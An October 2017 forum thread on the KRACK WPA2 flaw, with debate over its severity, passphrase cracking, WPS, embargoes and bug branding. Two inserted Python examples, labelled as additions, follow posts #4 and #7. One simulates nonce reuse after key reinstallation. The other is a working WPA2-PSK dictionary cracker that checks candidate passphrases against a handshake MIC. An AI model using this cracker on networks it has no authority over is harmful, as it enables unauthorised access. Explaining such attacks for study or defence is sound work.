LinuxQuestions.org
Old 10-16-2017, 08:41 AM   #1
suicidaleggroll
WPA2 is dead


A serious vulnerability has been found in WPA2, which brings it to the level of WEP (aka: might as well not have any encryption).

https://www.alexhudson.com/2017/10/1...ken-krack-now/
https://arstechnica.com/information-...eavesdropping/

Thoughts?

Last edited by suicidaleggroll; 10-16-2017 at 08:53 AM.
 
Old 10-16-2017, 08:56 AM   #2
Turbocapitalist
Quote:
Originally Posted by suicidaleggroll View Post
(aka: might as well not have any encryption)
That WPA2 has fatally weak encryption has been known for years. I've known people that explained in great detail how to do it. WEP is basically like a paper sticky saying 'Do Not Enter' in place of a hardened lock. WPA2 is that backed up with a large paperclip for a lock.

Anyone using wi-fi should be tunnelling, either over SSH or over IPSec or over an SSH VPN or a regular VPN like OpenVPN. Again, that has been clear for many years. I'll have to look at Lede, OpenWRT, DD-WRT more closely so as to be able to make more detailed recommendations about implementing a VPN.

Anyway, this fancy, brand-named bug (complete with a web site and its own domain) is problematic only in that the news was embargoed for so many months and various projects therefore kept from patching for an unreasonable length of time. Not that the patch would do much good though, it's still going to be WPA2 at the end of the day. Perhaps for the next wireless encryption standard they will consult some encryption experts. I'm sure there are good ones available for hire for the right pay.
 
Old 10-16-2017, 08:57 AM   #3
ntubski
Just a flesh wound

See https://www.krackattacks.com/
Quote:
Do we now need WPA3?

No, luckily implementations can be patched in a backwards-compatible manner.
Quote:
Originally Posted by Turbocapitalist View Post
That WPA2 has fatally weak encryption has been known for years. I've known people that explained in great detail how to do it.
Citation? AFAICT, this attack does not actually directly attack the encryption itself.

Last edited by ntubski; 10-16-2017 at 08:58 AM.
 
Old 10-16-2017, 10:01 AM   #4
suicidaleggroll
My cursory read through this morning suggested that an attacker could obtain the actual network PSK from a compromised client (which would mean that all it would take was a single unpatched client anywhere on the network to compromise the whole thing), but reading through it again I see now that they can only obtain the encryption key for that specific connection.

This means that any unpatched client will have its own connection decrypted and possibly interfered with, but not the rest of the network. Still bad, but not as bad as I originally thought.

Last edited by suicidaleggroll; 10-16-2017 at 10:04 AM.
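The mechanism behind the key reinstallation attack discussed in the posts above, as an added example that is not part of the thread or of the KRACK paper's code: a client that processes a retransmitted message 3 of the 4-way handshake reinstalls the same temporal key and, as the 802.11 state machine requires on key installation, resets its packet number to zero. The attacker never learns the key; what it gets is two frames encrypted under the same key and the same CCMP nonce, and in a counter-mode cipher that means the same keystream, so the XOR of the ciphertexts is the XOR of the plaintexts and one guessable frame (ARP, DHCP, DNS) exposes the other. Real CCMP uses AES in CTR mode with the 48-bit packet number in the nonce; the keystream below is HMAC-SHA256 in counter mode so the example runs on the standard library alone (an assumption, not 802.11 code). The frames, key and MAC-level details are constructed for the example. The patched branch mirrors the backwards-compatible fix: a client that already has this key in use ignores the retransmission instead of reinstalling it.

```python
"""Added example: why a reinstalled WPA2 pairwise key is fatal for CCMP.

Models a supplicant that receives message 3 of the 4-way handshake twice.
The key reinstallation resets the packet number (PN), which is the CCMP
nonce, so two different frames are encrypted under the same (key, nonce)
pair and the attacker can XOR the ciphertexts. Real CCMP uses AES in CTR
mode; this stand-in keystream uses HMAC-SHA256 in counter mode so the
example needs only the standard library (an assumption, not 802.11 code).
"""
import hashlib
import hmac

# Constructed sample frames: one whose plaintext the attacker can guess
# (an ARP request), one that is actually secret. Both are 37 bytes.
KNOWN_PLAINTEXT = b"ARP who-has 192.0.2.1 tell 192.0.2.42"
SECRET_PLAINTEXT = b"GET /login?user=alice&pw=hunter2 HTTP"
TK = bytes.fromhex("000102030405060708090a0b0c0d0e0f")  # constructed 128-bit temporal key


def keystream(key: bytes, pn: int, length: int) -> bytes:
    """Counter-mode keystream keyed by TK and the 48-bit packet number."""
    out = bytearray()
    block = 0
    while len(out) < length:
        ctr = pn.to_bytes(6, "big") + block.to_bytes(2, "big")
        out += hmac.new(key, ctr, hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    """Client side of the handshake; `patched` selects the fixed behaviour."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.tk = None
        self.pn = 0  # transmit packet number; CCMP increments it per frame

    def on_message3(self, tk: bytes) -> str:
        """Install the negotiated TK. Installing a key resets PN to zero."""
        if self.patched and self.tk == tk:
            # Fixed clients remember that this key is already in use and
            # do not reinstall it when message 3 is retransmitted.
            return "retransmission ignored"
        self.tk = tk
        self.pn = 0
        return "key installed"

    def send(self, plaintext: bytes):
        """Encrypt one frame; returns (pn, ciphertext) as seen on the air."""
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.tk, self.pn, len(plaintext)))


def run_attack(patched: bool) -> dict:
    sta = Supplicant(patched)
    sta.on_message3(TK)                       # message 3 arrives, key installed
    pn1, c1 = sta.send(KNOWN_PLAINTEXT)       # client sends a frame, PN = 1
    # The attacker, sitting between client and AP as a channel-based
    # man-in-the-middle, blocks message 4, so the AP retransmits message 3
    # and the client processes it a second time.
    outcome = sta.on_message3(TK)
    pn2, c2 = sta.send(SECRET_PLAINTEXT)      # next frame: PN reused if reinstalled
    recovered = None
    if pn1 == pn2:
        # Same key and nonce => same keystream, so c1 XOR c2 = p1 XOR p2 and a
        # guessed plaintext for frame 1 yields frame 2 in the clear.
        recovered = xor(xor(c1, c2), KNOWN_PLAINTEXT)
    return {"outcome": outcome, "pn1": pn1, "pn2": pn2, "recovered": recovered}


if __name__ == "__main__":
    for patched in (False, True):
        r = run_attack(patched)
        label = "patched" if patched else "vulnerable"
        print(label, r["outcome"], "PN", r["pn1"], r["pn2"], r["recovered"])
```

Run it and the vulnerable client reports both frames with PN 1 and the secret request recovered; the patched client reports PN 1 and 2 and nothing recovered. This is why the fix is backwards-compatible: the handshake on the wire is unchanged, only the client's key-install bookkeeping is.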
 
Old 10-16-2017, 10:23 AM   #5
Turbocapitalist
No I won't visit Branded Bug (tm) Custom Web Site and drive traffic their way.

Quote:
Originally Posted by ntubski View Post
Citation?
As for citations, there are two methods described here:
https://www.howtogeek.com/202441/you...E2%80%99s-how/

There are some variations depending on how the network is set up. There are more methods. If you really want to know, there have been guides and howtos for all the setups and some time with a search engine will reveal them.
 
Old 10-16-2017, 11:28 AM   #6
ntubski
Quote:
Originally Posted by Turbocapitalist View Post
No I won't visit Branded Bug (tm) Custom Web Site and drive traffic their way.
Would you prefer the author's personal site then? https://papers.mathyvanhoef.com/ccs2017.pdf


Quote:
Originally Posted by Turbocapitalist View Post
As for citations, there are two methods described here:
https://www.howtogeek.com/202441/you...E2%80%99s-how/

There are some variations depending on how the network is set up. There are more methods. If you really want to know, there have been guides and howtos for all the setups and some time with a search engine will reveal them.
Quote:
Cracking the WPA Handshake

With the raw data captured, an attacker can use a tool like cowpatty or aircrack-ng along with a “dictionary file” that contains a list of many possible passwords. These files are generally used to speed up the cracking process
[...]
It’s tough to say how long it would take to crack a password in this way. For a good, long password, it could take years, possibly even hundreds of years or longer. If the password is “password”, it would probably take less than a single second.
Okay, humans usually choose weak passwords. I'm not sure that really counts as WPA2 using "weak encryption" though.

Quote:
Breaking WPS With Reaver

There’s also an attack against WPS, an unbelievably vulnerable system that many routers ship with enabled by default.
Yes, WPS is definitely vulnerable, but it's not WPA2.

Quote:
Originally Posted by Turbocapitalist View Post
Anyway, this fancy, brand-named bug (complete with a web site and its own domain) is problematic only in that the news was embargoed for so many months and various projects therefore kept from patching for an unreasonable lenght of time.
Hmm, yeah, in fact:

Quote:
https://www.krackattacks.com/

Why did OpenBSD silently release a patch before the embargo?

OpenBSD was notified of the vulnerability on 15 July 2017, before CERT/CC was involved in the coordination. Quite quickly, Theo de Raadt replied and critiqued the tentative disclosure deadline: “In the open source world, if a person writes a diff and has to sit on it for a month, that is very discouraging”. Note that I wrote and included a suggested diff for OpenBSD already, and that at the time the tentative disclosure deadline was around the end of August. As a compromise, I allowed them to silently patch the vulnerability. In hindsight this was a bad decision, since others might rediscover the vulnerability by inspecting their silent patch. To avoid this problem in the future, OpenBSD will now receive vulnerability notifications closer to the end of an embargo.
 
Old 10-16-2017, 11:35 AM   #7
Turbocapitalist
Yeah, the WPS method is not WPA2. The deauth + bruteforce method works well enough for WPA2 though, especially with GPUs and/or clustered computing available by the hour.

However, if I recall correctly, there is a better but slightly less well-known method. But since I can't or won't cite a source, that's just hearsay.
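The "deauth + bruteforce" method the last two posts refer to, as an added example that is not from the thread, from aircrack-ng or from cowpatty: after a deauthentication forces the client to reconnect, the attacker captures the 4-way handshake and works offline. Each candidate passphrase is turned into a PMK with PBKDF2-HMAC-SHA1 (SSID as salt, 4096 iterations, 32 bytes), expanded to a PTK with the 802.11i PRF-512, and the first 16 bytes (the KCK) are used to recompute the MIC of handshake message 2; a match means the guess is right. Nothing here breaks AES or the handshake; what it exploits is that the PSK is derived from a human-chosen passphrase and the check can be run at full speed on GPUs. The "capture" below is constructed in code (made-up MACs, nonces and EAPOL bytes) so the example runs offline; the PRF and MIC construction are the WPA2-PSK (AKM 00-0F-AC:2) ones, not those of the SHA-256 or 802.11r AKMs.

```python
"""Added example: offline dictionary attack on a captured WPA2-PSK handshake.

Reproduces what aircrack-ng / cowpatty do with a handshake capture: derive
the PMK from each candidate passphrase (PBKDF2-HMAC-SHA1, 4096 rounds, SSID
as salt), expand it to the PTK with the 802.11i PRF, and check the MIC of
handshake message 2 with the first 16 bytes (the KCK). The "capture" below
is constructed in code so the example runs offline; MAC addresses, nonces
and the EAPOL frame bytes are made up, not taken from a real network.
"""
import hashlib
import hmac
from typing import Optional

SSID = "CoffeeShop"  # constructed


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 for WPA2-PSK (AKM 00-0F-AC:2); SHA-256 based AKMs use a different KDF."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = [:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the EAPOL frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_capture(passphrase: str) -> dict:
    """Constructed stand-in for a sniffed 4-way handshake (message 2 carries the MIC)."""
    ap_mac = bytes.fromhex("02000000aa01")   # made-up locally administered MACs
    sta_mac = bytes.fromhex("02000000bb02")
    anonce = hashlib.sha256(b"anonce-sample").digest()  # stand-in for random nonces
    snonce = hashlib.sha256(b"snonce-sample").digest()
    eapol = (b"\x01\x03\x00\x5f"          # EAPOL version 1, type Key, body length 95
             + b"\x02"                    # descriptor type: RSN
             + b"\x01\x0a"                # key info: pairwise, MIC set, HMAC-SHA1 (message 2)
             + b"\x00\x00"                # key length (0 in message 2)
             + b"\x00" * 7 + b"\x01"      # replay counter
             + snonce                     # key nonce
             + b"\x00" * 16               # key IV
             + b"\x00" * 8                # key RSC
             + b"\x00" * 8                # key ID
             + b"\x00" * 16               # MIC field, zeroed for the computation
             + b"\x00\x00")               # key data length 0
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": SSID, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(capture: dict, wordlist) -> Optional[str]:
    """Return the passphrase whose derived KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return word
    return None


if __name__ == "__main__":
    cap = build_capture("letmein123")
    print(crack(cap, ["password", "12345678", "qwertyui", "letmein123"]))
```

Two things worth noticing when you run it: the per-guess cost is fixed by PBKDF2 (two blocks of 4096 HMAC-SHA1 each, so 8192 HMAC calls per candidate) and cannot be lowered by the attacker, which is why a long random passphrase holds up while "password" does not; and the check needs only the SSID, the two MACs, the two nonces and one MIC, all of which are in the clear in the capture, so a single deauth of a single client is enough to take the attack offline for as long as the attacker likes.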
 
Old 10-16-2017, 10:09 PM   #8
sundialsvcs
The wireless password is usually posted at the front counter of the coffee shop.
 
Old 10-16-2017, 11:23 PM   #9
!!!
excessive FUD, cuz "security isn't".

Even CL: https://sfbay.craigslist.org/sfc/pol...348470897.html
Quote:
Major Wi-Fi vulnerability inspires panic
Infosec reporters and experts in my Twitter timeline were losing their minds about this ...
In the research paper he describes the attack as "exceptionally devastating" against Android 6.0.
Me? RFC1918 & minimal door lock. Equifax, Y!, &all shows me: "security isn't".
 
Old 10-17-2017, 01:35 AM   #10
YesItsMe
Ironically, Windows is secure (once more) as it implements the protocol poorly.

edit: Also, I find protocol bugs with their own name, logo and website sick and the authors should, as always, be ashamed. This is not some funny gadget.

Last edited by YesItsMe; 10-17-2017 at 01:37 AM.
 
Old 10-17-2017, 07:28 AM   #11
ntubski
Quote:
Originally Posted by YesItsMe View Post
edit: Also, I find protocol bugs with their own name, logo and website sick and the authors should, as always, be ashamed. This is not some funny gadget.
I don't understand your comment about the "funny gadget". IMO, it's actually an effective way of disseminating knowledge of the bug.
 
Old 10-17-2017, 07:43 AM   #12
YesItsMe
"Here's the new iPad!"

"Enjoy the new Surface Pro!"

"Check out KRACK!"

Oh dear.

Non-tech people won't understand the issue just because you plant a shiny logo on it anyway.
 
Old 10-17-2017, 08:55 AM   #13
IsaacKuo
FWIW, Debian already had a patch for this yesterday morning. Which doesn't help my Android devices or my Unifi WAP yet though...
 
Old 10-17-2017, 09:44 AM   #14
ntubski
What's more memorable: "heartbleed" or CVE-2014-0160? Even "tech people" are humans (as much as they would like to pretend otherwise).
 
Old 10-17-2017, 09:45 AM   #15
YesItsMe
Memorability is not the most important aspect of a security hole.
 
  

